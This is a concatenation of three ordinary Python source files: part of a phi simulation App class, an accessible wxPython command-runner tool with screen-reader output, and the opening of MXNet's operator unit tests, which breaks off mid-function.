self._custom_properties[key] = value
if self.prepared:
self._update_scene_properties()
def add_custom_properties(self, dictionary):
self._custom_properties.update(dictionary)
if self.prepared:
self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene:
return
try:
app_name = os.path.basename(inspect.getfile(self.__class__))
app_path = inspect.getabsfile(self.__class__)
except TypeError:
app_name = app_path = ''
properties = {
'instigator': 'App',
'traits': self.traits,
'app': str(app_name),
'app_path': str(app_path),
'name': self.name,
'description': self.subtitle,
'all_fields': self.fieldnames,
'actions': [action.name for action in self.actions],
'controls': [{control.name: control.value} for control in self.controls],
'summary': self.scene_summary(),
'time_of_writing': self.steps,
'world': struct.properties_dict(self.world.state)
}
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return ''.join([
' ' + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
message = str(message)
self.message = message
self.logger.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def show(self, *args, **kwargs):
warnings.warn("Use show(model) instead.", DeprecationWarning, stacklevel=2)
from phi.viz.display import show
show(self, *args, **kwargs)
@property
def status(self):
pausing = '/Pausing' if self._pause and self.current_action else ''
action = self.current_action if self.current_action else 'Idle'
message = (' - %s' % self.message) if self.message else ''
return '{}{} ({}){}'.format(action, pausing, self.steps, message)
def run_step(self, framerate=None, allow_recording=True):
self.current_action = 'Running'
starttime = time.time()
try:
self.progress()
if allow_recording and self.steps % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0 / framerate - duration
if rest > 0:
self.current_action = 'Waiting'
time.sleep(rest)
except Exception as e:
self.info('Error during %s.step() \n %s: %s' % (type(self).__name__, type(e).__name__, e))
self.logger.exception(e)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True, callback_if_aborted=False):
if framerate is None:
framerate = self.framerate
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
if not self._pause or callback_if_aborted:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = 'Recording'
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.steps, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered_tensor() if isinstance(a, StaggeredGrid) else a.data for a in arrays]
names = [n.lower() for n in self.recorded_fields]
files += write_sim_frame(self.directory, arrays, names, self.steps)
if files:
self.message = 'Frame written to %s' % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=np.inf, allow_recording=False)
step_count += 1
if self._pause:
break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1, len(n)):
if n[i] == '_':
n[i] = ' '
if len(n) > i + 1:
n[i + 1] = n[i + 1].upper()
return ''.join(n)
|
AccessibleRunner.py
|
# TODO
# * Resize the command output textbox together with the window.
# * Make the size of the help dialog relative to the desktop size.
import os
import sys
import wx
import re
import psutil
import accessible_output2.outputs.auto
from subprocess import call, Popen, PIPE, STDOUT
from threading import Thread
from playsound import playsound
from cefpython3 import cefpython as cef
from config import Config
from gui import MainFrame
ON_WINDOWS = os.name == 'nt'
# Main application class.
class AccessibleRunner:
# Maximum number of items in the commands history.
COMMANDS_HISTORY_LIMIT = 10
# Maximum number of items in the working directories history.
DIRECTORIES_HISTORY_LIMIT = 10
# Maximum number of items in the find texts history
FIND_TEXTS_HISTORY_LIMIT = 10
# Maximum number of items in the line substitution regular expression history
SUBSTITUTION_REGEXES_HISTORY_LIMIT = 10
# Maximum number of items in the line substitution replacement history
SUBSTITUTION_REPLACEMENTS_HISTORY_LIMIT = 10
# Paths to sounds directory and files
SOUNDS_PATH = 'sounds/'
SUCCESS_SOUND_PATH = SOUNDS_PATH + 'success.mp3'
ERROR_SOUND_PATH = SOUNDS_PATH + 'error.mp3'
NOT_FOUND_SOUND_PATH = SOUNDS_PATH + 'Windows Background.wav'
# Initializes the object.
def __init__(self, config):
self.config = config
self.active = True
self.process = None
self.sr = accessible_output2.outputs.auto.Auto()
# Sets the UI object for this runner.
def setUI(self, ui):
self.ui = ui
# Sets the active state of the application to the given value.
def setActive(self, active):
self.active = active
# Runs the given command in a new process starting in the given working directory . The "useShell" parameter indicates if the command should be executed through the shell.
def runProcess(self, command, directory, useShell):
if self.process is not None:
return
# Add the command and directory to the history and ensure that blank or whitespace working directory value means the current working directory should be used
self.addToCommandsHistory(command)
if directory.strip() == '':
directory = None
self.addToDirectoriesHistory(directory)
# On Windows, set the proper code page for console
# See https://stackoverflow.com/questions/67524114/python-how-to-decode-file-names-retrieved-from-dir-command-using-subprocess
if ON_WINDOWS:
call(['chcp', '65001'], shell = True)
# Try running the command
try:
self.process = Popen(command, cwd = directory, shell = useShell, stdout = PIPE, stderr = STDOUT, stdin = PIPE)
except (NotADirectoryError, FileNotFoundError):
errorMessage = 'Error: The working directory \'{}\' does not exist.\n'.format(directory)
self.ui.setOutput(errorMessage, True)
self.srOutput(errorMessage)
self.ui.setAsNotRunning()
else:
# Start fetching the process output in a new thread
thread = Thread(target = self.fetchOutput, args = (self.process.stdout, None))
thread.daemon = True # Thread dies with the program
thread.start()
self.ui.setAsRunning()
# Cleans everything on exit, including saving the changes to the config file.
def clean(self):
self.killProcessTree()
self.config.saveToFile()
# Adds the given item to the given history record with the given limit and returns the new items list.
def addToHistory(self, item, record, limit):
if (item.strip() == '') or item is None:
return
items = self.config.history[record]
# If the item already exists in the history, remove it
try:
index = items.index(item)
items.pop(index)
except:
pass
# Add the item to the begining of the history
items.insert(0, item)
# Remove the items which exceed the history limit
items = items[:limit]
return items
# Adds the given command to the history.
def addToCommandsHistory(self, command):
commands = self.addToHistory(command, 'commands', AccessibleRunner.COMMANDS_HISTORY_LIMIT)
# Set the new command choices
self.ui.setCommandChoices(commands)
# Adds the given directory to the history.
def addToDirectoriesHistory(self, directory):
if directory is None:
return
directories = self.addToHistory(os.path.normpath(directory), 'directories', AccessibleRunner.DIRECTORIES_HISTORY_LIMIT)
# Set the new directory choices
self.ui.setDirectoryChoices(directories)
# Adds the given find text to the history.
def addToFindTextsHistory(self, findText):
self.addToHistory(findText, 'findTexts', AccessibleRunner.FIND_TEXTS_HISTORY_LIMIT)
# Adds the given line substitution regular expression to the history.
def addToSubstitutionRegexesHistory(self, regex):
self.addToHistory(regex, 'substitutionRegexes', AccessibleRunner.SUBSTITUTION_REGEXES_HISTORY_LIMIT)
# Merges the given settings with the config settings dictionary.
def mergeSettings(self, settings):
self.config.settings.update(settings)
# Adds the given line substitution replacement to the history.
def addToSubstitutionReplacementsHistory(self, replacement):
self.addToHistory(replacement, 'substitutionReplacements', AccessibleRunner.SUBSTITUTION_REPLACEMENTS_HISTORY_LIMIT)
# Clears the command output.
def clearOutput(self):
self.ui.setOutput('')
# Copies the command output string to the system clipboard.
def copyOutput(self):
if not wx.TheClipboard.IsOpened():
wx.TheClipboard.Open()
data = wx.TextDataObject()
data.SetText(self.ui.getOutput())
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
# Kills the currently running process and all its child processes.
def killProcessTree(self):
if not self.process:
return
parent = psutil.Process(self.process.pid)
children = parent.children(recursive = True)
for child in children:
child.kill()
psutil.wait_procs(children, timeout = 5)
try:
parent.kill()
parent.wait(5)
except:
pass
self.process = None
self.ui.setAsNotRunning()
# Plays the sound at the given path asynchronously.
def play(self, path):
thread = Thread(target = playsound, args = (path, None))
thread.daemon = True # Thread dies with the program
thread.start()
# Plays the success sound.
def playSuccess(self):
self.play(AccessibleRunner.SUCCESS_SOUND_PATH)
# Plays the error sound.
def playError(self):
self.play(AccessibleRunner.ERROR_SOUND_PATH)
# Plays the not found sound.
def playNotFound(self):
self.play(AccessibleRunner.NOT_FOUND_SOUND_PATH)
# Outputs the given text via screen reader, optionally interrupting the current output.
def srOutput(self, text, interrupt = False):
# Output only if screen reader is running
if not self.sr.is_system_output():
self.sr.output(text, interrupt = interrupt)
# Waits for the process output and continuously writes it to the command output. Depending on the current settings, plays success and error sounds if regular expression matches output line.
def fetchOutput(self, out, arg):
settings = self.config.settings
for line in iter(out.readline, b''):
lineString = line.decode()
# Apply the regex based line substitution if enabled
if settings['lineSubstitution']:
lineString = re.sub(settings['substitutionRegex'], settings['substitutionReplacement'], lineString)
isOutputOn = self.ui.isOutputOn()
# Output the line via screen reader if the output is on and if the main frame is active or if background output is turned on
if isOutputOn and (self.active or self.config.settings['srBgOutput']):
self.srOutput(lineString)
# Play sound if success regex matches
if settings['playSuccessSound']:
match = re.search(settings['successRegex'], lineString)
if match is not None:
self.playSuccess()
# Play sound if error regex matches
if settings['playErrorSound']:
match = re.search(settings['errorRegex'], lineString)
if match is not None:
self.playError()
# Append the line to the UI output if the output is on
if isOutputOn:
self.ui.setOutput(lineString, True)
out.close()
self.process = None
self.ui.setAsNotRunning()
# Main function.
def main():
app = wx.App()
config = Config()
runner = AccessibleRunner(config)
mainFrame = MainFrame(runner, config, title = MainFrame.WINDOW_TITLE)
runner.setUI(mainFrame)
app.MainLoop()
del app
cef.Shutdown()
main()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
